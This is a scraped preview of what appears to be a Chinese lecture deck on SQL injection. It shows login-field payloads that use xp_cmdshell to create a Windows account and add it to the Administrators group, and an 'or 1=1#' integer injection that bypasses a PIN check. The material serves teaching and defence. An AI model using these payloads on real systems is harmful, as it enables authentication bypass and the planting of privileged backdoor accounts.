原创力文档- 0
- 0
- 约6.08千字
- 约 47页
- 2017-02-09 发布于湖北
- 举报
更严重的后果 创建windows账号 SELECT * FROM users WHERE login = ‘’; exec master..xp_cmdshell net users username password /add;--’ and password= ’’ 添加到administrator组: SELECT * FROM users WHERE login = ‘; exec master..xp_cmdshell net localgroup Administrators username /add;--’ and password= ‘’ SQL Injection examples are outlined in: /papers/SQLInjectionWhitePaper.pdf /techtips/sql-injection.html 整型SQL注入 $sql=“Select * from clients Where” . “account=$acc AND” . “pin=$pin”; $acc = 1 or 1=1# $pin = 1111 Select * From clients Where account = 1 OR 1=1 # AND pin=1111 SQL注入字符 ‘ or “
文档评论(0)